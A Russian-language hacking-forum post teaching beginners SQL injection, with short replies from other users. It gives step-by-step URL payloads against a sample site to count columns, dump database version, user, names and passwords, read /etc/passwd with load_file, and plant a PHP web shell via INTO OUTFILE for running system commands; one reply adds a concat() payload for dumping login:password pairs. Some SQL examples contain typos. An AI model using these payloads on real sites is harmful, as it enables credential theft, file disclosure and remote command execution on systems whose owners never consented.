Сегодня я вам расскажу об одной известной уязвимости SQL-injection. Я понимаю, что подобных статей написано уже много, но у новичков всё равно возникает множество вопросов. Итак, приступим. Для начала немного разберёмся с языком SQL . 1. SELECT – команда для вывода информации из БД. Например: PHP: SELECT name, password, email FROM users; Этот запрос извлекает из таблицы users данные из полей name и password. Команда FROM, после которой через пробел идёт имя таблицы, указывает из какой таблицы будут извлекаться данные. 2. UNION – команда для объединения нескольких запросов в один. Например: PHP: SELECT name FROM admin UNION SELECT name, password FROM users;. (Данная команда работает только в MySQL 4.0 и выше, в более ранних версиях данная команда отсутствует.) 3. INSERT – команда для добавления данных в БД. Например: PHP: INSERT INTO users (name, password, email) VALUE (‘hacker’, ‘qwerty’, ‘hacker@hack.ru’); Слово INTO, после которого идёт название таблицы, указывает в какую таблицу должна производится запись. VALUE – значение полей. 4. DROP - команда для удаления данных из БД. Например: PHP: DROP TABLE users; где users имя таблицы. 5. UPDATE – команда для изменения данных в таблице. Например у нас в таблице users есть пользователь с именем admin, нам нужно сменить его пароль, значит вводим следующее: UPDATE users SET password = ‘qwerty’ WHERE name = admin; 6. CREATE TABLE – команда для создания таблицы в БД. Например: PHP: CREAT TABLE users (name char (15), password char (10)); Данная команда создаст таблицу users, с полями name и password. Char – тип данных, числа в скобках максимальная длинна значения поля. Ну вот с языком SQL мы немного разобрались, теперь приступим к SQL injection. Данная уязвимость позволяет посылать запросы в БД из адресной строки браузера. Есть несколько способов проверить является ли сайт уязвимым. Например, у нас есть адрес: PHP: www.lamer.org/index.php?id=1 В конце подставляем кавычку. Тогда ссылка примет следующий вид: PHP: www.lamer.org/index.php?id=1’ Должна появится ошибка, но если она не появилось это ещё не значит, что сайт не уязвим. Попробуем следующий вариант. PHP: www.lamer.org/index.php?id=2-1. Если арифметическое выражение выполнилось и мы увидели те же данный что и при www.lamer.org/index.php?id=1 то значит скрипт не отфильтровал выражение, а выполнил его, это значит, что уязвимость скорей всего присутствует. Допустим, мы определили, что сайт уязвим. Первым делом нам нужно подобрать количество полей. Это делается для того, что бы узнать значение какого поля отображается на экране. PHP: www.lamer.org/index.php?id=-1+union+select+1,2,3,4,5,6/* (/* - это знак комментария, все что будет идти поле него, будет считаться комментарием) Предположим у нас отобразилась цифра 4, значит отображалось значение четвёртого поля. Количество полей можно перебрать и другим способом при помощи оператора order by. Например: PHP: www.lamer.org/index.php?id=-1+order+by+2/* Если не появилась ошибка – используется полей больше чем 2 (или равное 2). PHP: www.lamer.org/index.php?id=-1+order+by+6/* Если появилась ошибка – это значит, что полей в запросе меньше 6. Продолжаем дальше. Вводим следующий запрос: PHP: www.lamer.org/index.php?id=-1+order+by+3/* Если ошибка не появилась то полей больше чем 3 (или равное 3). PHP: www.lamer.org/index.php?id=-1+order+by+5/* Если появилась ошибка значит полей меньше пяти. PHP: www.lamer.org/index.php?id=-1+order+by+4/* Если ошибка не появилась - это значит, что количество полей равно 4. Итак, продолжим. Теперь начинаем выполнять команды. PHP: www.lamer.org/index.php?id=-1+union+select+1,2,3,version(),5,6/* Должна отобразится версия SQL. Например 4.0 Узнаём имя пользователя БД: PHP: www.lamer.org/index.php?id=-1+union+select+1,2,user(),5,6/* Так мы получим имя пользователя БД. Например lamer@localhost Получаем имя БД PHP: www.lamer.org/index.php?id=-1+union+select+1,2,database(),5,6/* Таким образом мы узнали имя БД. Например: lamers Сейчас нам надо узнать в какой таблице хранятся данные пользователей. PHP: www.lamer.org/index.php?id=-1+union+select+1,2,name,5,6+from+users+limit+1,1/* Если имя таблицы указали правильно, в нашем случае – это users, то должно отобразится имя первого пользователя. Например: admin. Теперь нам нужно узнать пароль данного пользователя. PHP: www.lamer.org/index.php?id=-1+union+select+1,2,password,5,6+from+users+limit+1,1/* Должен отобразится пароль пользователя admin. Например mego_lamer. Теперь осталось только найти админку и залогинется под пользователем admin. Так же есть возможность через SQL-injection есть возможность читать файлы на сервере. Для этого выполняем следующее: PHP: www.lamer.org/index.php?id=-1+union+select+1,2,3,load_file(/etc/passwd),5,6/* Таким образом мы открыли файл passwd в каталоге /etc. Заливаем Web Shell через SQL-injection. Предположим мы зашли в админку, но так и не нашли с помощь чего нам можно залить шелл. Но есть поле для вводя запросов в БД. Отчаиваться не будем, сейчас мы зальём шелл через SQL. Например у нас есть таблица articles в ней поле computers. Выполним следующую команду: PHP: INSERT INTO articles (computers) value (‘<? system($_GET[‘’cmd’’]) ?>’); Обратите внимание, что cmd заключено в две одинарные кавычки с каждой стороны и выглядит так ‘’cmd’’ хотя в php должно быть так ‘cmd’. Всё потому, что если мы оставим так, как и в php коде, то SQL выдаст ошибку. Так мы добавили в таблицу articles в поле computers новую запись. Теперь с помощью команды PHP: select computers from articles into outfile '/home/lamer/www/shell.php'; мы сохраняем значение поля computers в файл shell.php. /home/lamer/www – путь к веб директории.(он может быть другим). Теперь переходим по адресу PHP: www.lamer.org/shell.php?cmd=ls –la Если команда ls –la выполнилась успешно, то мы увидим содержимое веб директории. Автор: FraiDex
Незачот, http://forum.antichat.ru/thread19844.html-здесь подано посерьознее. рассмотрен самый тривиальный случай =\
Я конешн в этих делах ламер,но всегда думал что после id =нужно писать или -n или + большое число что бы скуль пустой результат вернул.
Поскольку эта тема для "самых маленьких". Хочу добавить малось. www.lamer.org/index.php?id=-1+union+select+1,2,concat(database(),char(58),version(),char(58),user()),5,6 concat() - обединение,нескольких запросов. char(58) - добавление ":". Пример. concat(login,char(58),password) ==>admin:qwerty Также используется "0x3a"(аналогично).
